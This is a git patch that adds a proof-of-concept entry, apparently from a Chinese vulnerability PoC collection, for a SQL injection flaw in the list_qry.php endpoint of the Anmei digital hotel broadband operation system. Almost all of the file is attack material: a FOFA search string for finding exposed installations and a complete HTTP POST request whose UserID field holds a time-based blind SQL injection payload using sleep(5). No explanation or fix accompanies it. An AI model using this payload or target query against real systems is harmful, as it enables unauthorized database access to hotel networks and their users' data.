From e99e5c78c60f05aa3f8dae200ac089b78186eee7 Mon Sep 17 00:00:00 2001
From: Nexolanta <73454853+Nexolanta@users.noreply.github.com>
Date: Sat, 8 Mar 2025 22:09:52 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=AE=89=E7=BE=8E=E6=95=B0=E5=AD=97?=
 =?UTF-8?q?=E9=85=92=E5=BA=97=E5=AE=BD=E5=B8=A6=E8=BF=90=E8=90=A5=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9Flist=5Fqry.php=E6=8E=A5=E5=8F=A3SQL=E6=B3=A8=E5=85=A5?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞 | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)

diff --git a/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞 b/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞
index 8b13789..19a80e4 100644
--- a/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞
+++ b/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞
@@ -1 +1,24 @@
+## 安美数字酒店宽带运营系统SQL注入漏洞
 
+
+## fofa
+```
+title=酒店宽带运营系统
+```
+
+## POC
+```
+POST /user/list_qry.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 94
+
+UserID=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&starttime=2023-01-01&stoptime=2023-12-31
+```